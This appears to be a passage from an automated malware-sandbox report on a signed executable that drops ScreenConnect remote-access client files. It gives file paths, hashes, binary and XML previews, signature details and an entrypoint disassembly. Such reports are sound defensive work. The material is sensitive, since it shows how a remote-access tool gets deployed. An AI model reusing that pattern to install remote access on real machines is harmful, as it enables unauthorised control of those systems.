                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1121
                                                                                                                                                                                                                                                        Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                        MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                        SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                        SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                        SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):4.3938119652396646
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:Ml4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNArOBSqa:E4vF0MYQUMM6VFYSrU
                                                                                                                                                                                                                                                        MD5:689C4E48F6096B43C2FD4640B881917F
                                                                                                                                                                                                                                                        SHA1:35F9D8BFDFB8C413C19CE844AC49B1494C6C06DD
                                                                                                                                                                                                                                                        SHA-256:EC9D1751AEFAA3C24E6CBE2E1868876F4C67C6BD02805EBD435C06638C5578BA
                                                                                                                                                                                                                                                        SHA-512:02CF34230FBC734DCD03C165E8B491AC7100E83208CEA291A514C4C2A9725A7A64537F1FB79E69589E437B34A3A05F38C57BC94591813265CF280E33192F5B8B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..r!.'...............................................................................................................................................................................................................................................................................................................................................'e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.515402169306783
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:khwHsyfsJ1.exe
                                                                                                                                                                                                                                                        File size:83'360 bytes
                                                                                                                                                                                                                                                        MD5:24686214dadbe686482fb77f11010df4
                                                                                                                                                                                                                                                        SHA1:f8c830e878b6f1d5ab63181fec3dbf4fc91f2442
                                                                                                                                                                                                                                                        SHA256:89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f
                                                                                                                                                                                                                                                        SHA512:c18688fd26c320d1ad96c026d4f6ac2432aa09e2828103cce9fd94dac22504379c3d2e7e076fb3c7c1aa98e9bdc5d6b4a886daf03c83b5f9a675dc9f6dd1715f
                                                                                                                                                                                                                                                        SSDEEP:1536:+oG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYg73xh:2enkyfPAwiMq0RqRfbayZJYYg7
                                                                                                                                                                                                                                                        TLSH:A0835B53B5D18875E9720E3118B1E9B4593FBE110EA48DAF3398422E0F351D19E3AE7B
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                        • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007F871106316Ah
                                                                                                                                                                                                                                                        jmp 00007F8711062C1Fh
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                        je 00007F8711062DA7h
                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
